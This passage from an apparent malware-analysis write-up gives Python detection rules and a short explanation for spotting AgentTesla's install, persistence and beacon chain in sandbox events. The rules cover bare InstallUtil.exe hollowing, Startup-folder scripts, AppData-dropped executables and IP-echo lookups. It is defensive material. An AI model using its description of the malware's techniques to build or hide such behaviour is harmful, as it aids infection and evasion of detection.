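def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def decode_raw_hex(hex_bytes: str) -> str:
    """Turn the report's 'Data Raw' hex dump back into the ASCII response body."""
    return bytes.fromhex(hex_bytes.replace(" ", "")).decode("ascii", errors="replace")


def installutil_without_assembly(ev: Dict) -> bool:
    """InstallUtil.exe needs an assembly path; a bare invocation is a classic hollowing target."""
    return (ev["type"] == "process"
            and basename(ev["image"]) == "installutil.exe"
            and len(split_cmdline(ev["cmdline"])) == 1)


def script_host_from_startup(ev: Dict) -> bool:
    """wscript/cscript executing a script that lives in the per-user Startup folder."""
    if ev["type"] != "process" or basename(ev["image"]) not in ("wscript.exe", "cscript.exe"):
        return False
    return any(STARTUP_DIR.search(arg) for arg in split_cmdline(ev["cmdline"])[1:])


def exe_in_appdata_root(ev: Dict) -> bool:
    """An executable sitting directly under AppData\\Roaming (the dropped copy of the sample)."""
    return ev["type"] == "process" and bool(APPDATA_ROOT_EXE.search(ev["image"]))


def ip_echo_from_non_browser(ev: Dict) -> bool:
    """IP-echo lookup from a non-browser; when the body was captured, confirm it is a bare IPv4."""
    if ev["type"] != "network" or ev["dst_host"].lower() not in IP_ECHO_HOSTS:
        return False
    if basename(ev["image"]) in BROWSERS:
        return False
    body = ev.get("body_hex")
    return body is None or bool(IPV4.match(decode_raw_hex(body).strip()))


RULES: Dict[str, Callable[[Dict], bool]] = {
    "installutil_no_assembly": installutil_without_assembly,
    "script_host_startup_folder": script_host_from_startup,
    "exe_in_appdata_root": exe_in_appdata_root,
    "ip_echo_non_browser": ip_echo_from_non_browser,
}


def run_rules(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule name, pid) for every event that matches a rule, in event order."""
    return [(name, ev["pid"]) for ev in events for name, rule in RULES.items() if rule(ev)]


def chain_matched(events: List[Dict]) -> bool:
    """True when at least three distinct rules fire, i.e. the install/persist/beacon chain is present."""
    return len({name for name, _ in run_rules(events)}) >= 3


if __name__ == "__main__":
    for name, pid in run_rules(SAMPLE_EVENTS):
        print(f"{name:28s} pid={pid}")
    print("full chain:", chain_matched(SAMPLE_EVENTS))
```

Each rule is deliberately narrow so that it can be tuned on its own: the InstallUtil rule only fires on a bare command line, so a legitimate `InstallUtil.exe /u Service.exe` does not match, and the IP-echo rule exempts browsers because users do visit these services by hand. Because the report's sample is 32-bit and runs inside the 32-bit Framework directory, a production rule should match InstallUtil.exe under both Framework and Framework64. The chain check is what lifts the verdict from "suspicious" to "this is the AgentTesla install pattern": any one rule alone is noisy, but the sample trips all four in the space of a few seconds.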
